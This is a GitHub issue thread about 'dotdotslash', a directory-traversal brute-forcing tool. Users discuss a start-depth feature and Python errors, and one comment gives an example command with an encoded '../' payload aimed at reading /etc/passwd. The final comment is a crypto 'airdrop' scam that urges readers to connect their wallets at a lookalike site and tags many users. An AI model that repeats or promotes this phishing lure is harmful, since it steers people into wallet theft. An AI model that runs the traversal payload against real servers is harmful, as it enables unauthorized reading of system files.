### ISSUE TITLE
Start Depth

### ISSUE THREAD

**Issue by Chalco1712** [jcesarstef/dotdotslash#5]
It would be really cool if the tool could have a way to start it at a certain depth. Instead of starting at depth zero everytime

**Comment by Zamanry** [comment]
I may start contributing to this tool. Could you explain further what you mean? Wouldn't your provided URL already specify the depth you're looking for? Such as:
```
python dotdotslash.py --url 'http://192.168.210.16/cgi-bin/%2e%2e/%2e%2e/etc/passwd' --string 'etc/passwd'
```
In this case, `dotdotslash.py` would start brute forcing before the `etc`. I guess I don't understand the user case.

**Comment by justgu3st** [comment]
python2 dotdotslash.py --url http://example.com/dirtrav/example2.php?file=/var/www/files/hacker.png --string /var/www/files/hacker.png
Traceback (most recent call last):
  File "dotdotslash.py", line 7, in <module>
    from http.cookies import SimpleCookie
ImportError: No module named http.cookies

 python  dotdotslash.py --url http://example.com/dirtrav/example2.php?file=/var/www/files/hacker.png --string /var/www/files/hacker.png
[+] Depth: 0
Traceback (most recent call last):
  File "/home/kali/Desktop/tools/dotdotslash/dotdotslash.py", line 114, in <module>
    forloop()
  File "/home/kali/Desktop/tools/dotdotslash/dotdotslash.py", line 61, in forloop
    fullrewrite = re.sub(arguments.string, rewrite, arguments.url)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/re/__init__.py", line 185, in sub
    return _compile(pattern, flags).sub(repl, string, count)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/re/__init__.py", line 317, in _subx
    template = _compile_repl(template, pattern)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/re/__init__.py", line 308, in _compile_repl
    return _parser.parse_template(repl, pattern)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/re/_parser.py", line 1078, in parse_template
    raise s.error('bad escape %s' % this, len(this)) from None
re.error: bad escape \w at position 2

**Comment by Zamanry** [comment]
> python2 dotdotslash.py --url http://example.com/dirtrav/example2.php?file=/var/www/files/hacker.png --string /var/www/files/hacker.png Traceback (most recent call last): File "dotdotslash.py", line 7, in from http.cookies import SimpleCookie ImportError: No module named http.cookies
> 
> python dotdotslash.py --url http://example.com/dirtrav/example2.php?file=/var/www/files/hacker.png --string /var/www/files/hacker.png [+] Depth: 0 Traceback (most recent call last): File "/home/kali/Desktop/tools/dotdotslash/dotdotslash.py", line 114, in forloop() File "/home/kali/Desktop/tools/dotdotslash/dotdotslash.py", line 61, in forloop fullrewrite = re.sub(arguments.string, rewrite, arguments.url) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/re/**init**.py", line 185, in sub return _compile(pattern, flags).sub(repl, string, count) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/re/**init**.py", line 317, in _subx template = _compile_repl(template, pattern) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/re/**init**.py", line 308, in _compile_repl return _parser.parse_template(repl, pattern) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/re/_parser.py", line 1078, in parse_template raise s.error('bad escape %s' % this, len(this)) from None re.error: bad escape \w at position 2

This tool doesn't support Python 2.X. Also, see #6 to fix the `\w` issue.

**Comment by jansseni** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
takeratta, @rensbaardman, @mohammadhb, @Marcellsantoso, @1HVhD25fCP1pMXAo1bdxZtb3L6qQR9MqGD, @fengmm521, @Sofiegolgoon, @kodjunkie, @krustyfur, @MELCHEZEDEK776, @fsinbad, @Wyvernslay3r, @timonology, @andreipa, @HangyuYe, @jsbuzz, @amran08, @kt-code, @shidii, @nsukonny
